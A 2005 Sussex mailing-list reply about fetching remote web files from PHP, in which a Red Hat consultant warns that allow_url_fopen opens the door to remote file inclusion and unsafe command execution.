[Sussex] Getting files from a remote web server in a PHP script

[Jon Fautley]

Mark Harrison (Groups) wrote:
> On Sat, 2005-10-22 at 19:46 +0100, Steve Dobson wrote:
> 
>>
>>I need to write a little script to fetch HTML files from a remote
>>web server from within a PHP script.  Now I could use system()
>>to call wget and do it that way.
>>
>>But I was wondering is there a better way (more direct) of getting 
>>the remote data?
> 
> 
> fopen supports http as if it were a file system, so you can do stuff
> like:
> 
> $myfile = fopen("http://www.remoteserver.com/mydirectory/myfile", "r");

I may be totally wrong here, but I'll say it anyway.

This is a security risk unless you are VERY VERY careful in what you do.
Enabling the allow_url_fopen enables remote file inclusion for most PHP 
functions that deal with files.

Imagine, if you will, that Steve is taking the data from a remote 
server, then processing it and passing that data to a command 
line/system() call for further processing - if the remote server is 
compromised then I'm sure you can all see what happens.

Another, more serious threat, is that you could assist a 
cross-site-scripting attack. If someone manages to inject arbitary PHP 
into your scripts (and most of these attacks are done automatically), 
then it's possible to randomly open remote files, and have that PHP run 
on your system. This is the most common way of compromising a PHP server.

I apologise if the above made as much sense as a cow standing on the 
moon with a pair of cloggs and a fedora on - it's Monday and I'm tired, 
but I hope you all see what I'm trying to say :)

Regards,

Jon
-- 
Jon Fautley <jfautley at redhat.com>     direct: +44 1483 739615
  Presales Technical Consultant        office: +44 1483 300169
  Red Hat UK                           mobile: +44 7841 558683
  10 Alan Turing Road, Surrey Research Park, Guildford GU2 7YF